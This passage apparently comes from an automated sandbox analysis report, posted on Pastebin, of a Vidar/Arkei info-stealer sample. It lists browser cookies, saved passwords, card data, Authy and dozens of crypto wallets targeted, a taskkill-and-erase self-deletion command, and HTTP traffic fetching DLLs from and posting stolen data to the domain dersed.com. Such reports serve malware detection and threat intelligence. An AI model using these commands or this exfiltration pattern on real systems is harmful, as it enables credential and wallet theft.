  843. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  844.  
  845.  
  846. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin\\*.*"
  847.  
  848.  
  849. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  850.  
  851.  
  852. "file": "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin\\"
  853.  
  854.  
  855.  
  856.  
  857. "Description": "Harvests credentials from local FTP client softwares",
  858. "Details":
  859.  
  860. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  861.  
  862.  
  863.  
  864.  
  865. "Description": "Harvests information related to installed instant messenger clients",
  866. "Details":
  867.  
  868. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  869.  
  870.  
  871.  
  872.  
  873. "Description": "Collects information to fingerprint the system",
  874. "Details":
  875.  
  876.  
  877. "Description": "Created network traffic indicative of malicious activity",
  878. "Details":
  879.  
  880. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  881.  
  882.  
  883.  
  884.  
  885. "Description": "Uses suspicious command line tools or Windows utilities",
  886. "Details":
  887.  
  888. "command": "\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  889.  
  890.  
  891. "command": "C:\\Windows\\System32\\cmd.exe /c taskkill /im gK19ixrobtPtI0.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe & exit"
  892.  
  893.  
  894. "command": "taskkill /im gK19ixrobtPtI0.exe /f"
  895.  
  896.  
  897.  
  898.  
  899.  
  900. * Started Service:
  901. "VaultSvc"
  902.  
  903.  
  904. * Mutexes:
  905. "Global\\CLR_PerfMon_WrapMutex",
  906. "Global\\CLR_CASOFF_MUTEX",
  907. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  908.  
  909.  
  910. * Modified Files:
  911. "C:\\Users\\user\\AppData\\Local\\GDIPFONTCACHEV1.DAT",
  912. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\passwords.txt",
  913. "C:\\ProgramData\\freebl3.dll",
  914. "C:\\ProgramData\\mozglue.dll",
  915. "C:\\ProgramData\\msvcp140.dll",
  916. "C:\\ProgramData\\nss3.dll",
  917. "C:\\ProgramData\\softokn3.dll",
  918. "C:\\ProgramData\\vcruntime140.dll",
  919. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\ld",
  920. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\historych",
  921. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History\\Google Chrome_Default.txt",
  922. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads\\Google Chrome_Default.txt",
  923. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\c",
  924. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt",
  925. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\wd",
  926. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill\\Google Chrome_Default.txt",
  927. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC\\Google Chrome_Default.txt",
  928. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft\\Authy\\\\xef\\x97\\xa8\\xcf\\x8a\\xe3\\xa2\\x9e\\xe7\\x9e\\xa9\\xc4\\xb8\\xc7\\xba\\xe3\\xa1\\xba\\xe7\\x9e\\xa9",
  929. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt",
  930. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt",
  931. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\cookie_list.txt",
  932. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\information.txt",
  933. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin\\\\x12",
  934. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Ethereum\\",
  935. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum\\\n",
  936. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectrumLTC\\",
  937. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus\\\n",
  938. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus\\",
  939. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectronCash\\",
  940. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MultiDoge\\\n",
  941. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Zcash\\",
  942. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DashCore\\",
  943. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin\\",
  944. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin\\",
  945. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin\\",
  946. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin\\",
  947. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin\\",
  948. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin\\",
  949. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko\\",
  950. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin\\",
  951. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\GoldCoinGLD\\\n",
  952. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin\\",
  953. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IOCoin\\",
  954. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin\\",
  955. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin\\",
  956. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin\\",
  957. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin\\",
  958. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin\\",
  959. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin\\",
  960. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin\\",
  961. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\JAXX\\",
  962. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\screenshot.jpg",
  963. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\US_00000000-0000-0000-0000-0000000000001449353492.zip",
  964. "\\??\\WMIDataDevice",
  965. "\\??\\PIPE\\samr",
  966. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  967. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  968. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  969. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  970. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  971. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  972. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  973. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  974.  
  975.  
  976. * Deleted Files:
  977. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2172.32295765",
  978. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2172.32295765",
  979. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2172.32295781",
  980. "C:\\ProgramData\\freebl3.dll",
  981. "C:\\ProgramData\\mozglue.dll",
  982. "C:\\ProgramData\\msvcp140.dll",
  983. "C:\\ProgramData\\nss3.dll",
  984. "C:\\ProgramData\\softokn3.dll",
  985. "C:\\ProgramData\\vcruntime140.dll",
  986. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill\\Google Chrome_Default.txt",
  987. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Autofill",
  988. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC\\Google Chrome_Default.txt",
  989. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\CC",
  990. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Edge_Cookies.txt",
  991. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\Google Chrome_Default.txt",
  992. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies\\IE_Cookies.txt",
  993. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Cookies",
  994. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\cookie_list.txt",
  995. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads\\Google Chrome_Default.txt",
  996. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Downloads",
  997. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History\\Google Chrome_Default.txt",
  998. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\History",
  999. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\information.txt",
  1000. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\passwords.txt",
  1001. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\screenshot.jpg",
  1002. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft\\Authy",
  1003. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Soft",
  1004. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Anoncoin",
  1005. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\BBQCoin",
  1006. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Bitcoin",
  1007. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DashCore",
  1008. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DevCoin",
  1009. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\DigitalCoin",
  1010. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectronCash",
  1011. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Electrum",
  1012. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\ElectrumLTC",
  1013. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Ethereum",
  1014. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Exodus",
  1015. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FlorinCoin",
  1016. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Franko",
  1017. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\FreiCoin",
  1018. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\GoldCoinGLD",
  1019. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\InfiniteCoin",
  1020. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IOCoin",
  1021. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\IxCoin",
  1022. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\JAXX",
  1023. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Litecoin",
  1024. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MegaCoin",
  1025. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MinCoin",
  1026. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\MultiDoge",
  1027. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\NameCoin",
  1028. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\PrimeCoin",
  1029. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\TerraCoin",
  1030. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\YACoin",
  1031. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets\\Zcash",
  1032. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\files\\Wallets",
  1033. "C:\\ProgramData\\INL61LTAKSDK2JW42M9OMZFR1\\US_00000000-0000-0000-0000-0000000000001449353492.zip",
  1034. "C:\\Users\\user\\AppData\\Local\\Temp\\gK19ixrobtPtI0.exe"
  1035.  
  1036.  
  1037. * Modified Registry Keys:
  1038. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  1039. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  1040. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  1041. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  1042. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  1043. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  1044. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  1045. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  1046. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  1047. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  1048. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  1049. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
  1050.  
  1051.  
  1052. * Deleted Registry Keys:
  1053.  
  1054. * DNS Communications:
  1055.  
  1056. "type": "A",
  1057. "request": "dersed.com",
  1058. "answers":
  1059.  
  1060. "data": "104.200.67.209",
  1061. "type": "A"
  1062.  
  1063.  
  1064.  
  1065.  
  1066. "type": "A",
  1067. "request": "ip-api.com",
  1068. "answers":
  1069.  
  1070. "data": "72.11.140.50",
  1071. "type": "A"
  1072.  
  1073.  
  1074. "data": "66.212.29.250",
  1075. "type": "A"
  1076.  
  1077.  
  1078.  
  1079.  
  1080.  
  1081. * Domains:
  1082.  
  1083. "ip": "104.200.67.209",
  1084. "domain": "dersed.com"
  1085.  
  1086.  
  1087. "ip": "72.11.140.50",
  1088. "domain": "ip-api.com"
  1089.  
  1090.  
  1091.  
  1092. * Network Communication - ICMP:
  1093.  
  1094. * Network Communication - HTTP:
  1095.  
  1096. "count": 1,
  1097. "body": "--1BEF0A57BE110FD467A--\r\n",
  1098. "uri": "http://dersed.com/288",
  1099. "user-agent": "",
  1100. "method": "POST",
  1101. "host": "dersed.com",
  1102. "version": "1.1",
  1103. "path": "/288",
  1104. "data": "POST /288 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1105. "port": 80
  1106.  
  1107.  
  1108. "count": 1,
  1109. "body": "",
  1110. "uri": "http://dersed.com/freebl3.dll",
  1111. "user-agent": "",
  1112. "method": "GET",
  1113. "host": "dersed.com",
  1114. "version": "1.1",
  1115. "path": "/freebl3.dll",
  1116. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1117. "port": 80
  1118.  
  1119.  
  1120. "count": 1,
  1121. "body": "",
  1122. "uri": "http://dersed.com/mozglue.dll",
  1123. "user-agent": "",
  1124. "method": "GET",
  1125. "host": "dersed.com",
  1126. "version": "1.1",
  1127. "path": "/mozglue.dll",
  1128. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1129. "port": 80
  1130.  
  1131.  
  1132. "count": 1,
  1133. "body": "",
  1134. "uri": "http://dersed.com/msvcp140.dll",
  1135. "user-agent": "",
  1136. "method": "GET",
  1137. "host": "dersed.com",
  1138. "version": "1.1",
  1139. "path": "/msvcp140.dll",
  1140. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1141. "port": 80
  1142.  
  1143.  
  1144. "count": 1,
  1145. "body": "",
  1146. "uri": "http://dersed.com/nss3.dll",
  1147. "user-agent": "",
  1148. "method": "GET",
  1149. "host": "dersed.com",
  1150. "version": "1.1",
  1151. "path": "/nss3.dll",
  1152. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1153. "port": 80
  1154.  
  1155.  
  1156. "count": 1,
  1157. "body": "",
  1158. "uri": "http://dersed.com/softokn3.dll",
  1159. "user-agent": "",
  1160. "method": "GET",
  1161. "host": "dersed.com",
  1162. "version": "1.1",
  1163. "path": "/softokn3.dll",
  1164. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1165. "port": 80
  1166.  
  1167.  
  1168. "count": 1,
  1169. "body": "",
  1170. "uri": "http://dersed.com/vcruntime140.dll",
  1171. "user-agent": "",
  1172. "method": "GET",
  1173. "host": "dersed.com",
  1174. "version": "1.1",
  1175. "path": "/vcruntime140.dll",
  1176. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\n\r\n",
  1177. "port": 80
  1178.  
  1179.  
  1180. "count": 1,
  1181. "body": "--1BEF0A57BE110FD467A--\r\n",
  1182. "uri": "http://ip-api.com/line/",
  1183. "user-agent": "",
  1184. "method": "POST",
  1185. "host": "ip-api.com",
  1186. "version": "1.1",
  1187. "path": "/line/",
  1188. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  1189. "port": 80
  1190.  
  1191.  
  1192. "count": 1,
  1193. "body": "",
  1194. "uri": "http://dersed.com/",
  1195. "user-agent": "",
  1196. "method": "POST",
  1197. "host": "dersed.com",
  1198. "version": "1.1",
  1199. "path": "/",
  1200. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 38585\r\nHost: dersed.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  1201. "port": 80
  1202.  
  1203.  
  1204.  
  1205. * Network Communication - SMTP:
  1206.  
  1207. * Network Communication - Hosts:
  1208.  
  1209. "country_name": "United States",
  1210. "ip": "66.212.29.250",
  1211. "inaddrarpa": "",
  1212. "hostname": "ip-api.com"
  1213.  
  1214.  
  1215. "country_name": "United States",
  1216. "ip": "104.200.67.209",
  1217. "inaddrarpa": "",
  1218. "hostname": "dersed.com"
  1219.  
  1220.  
  1221.  
  1222. * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!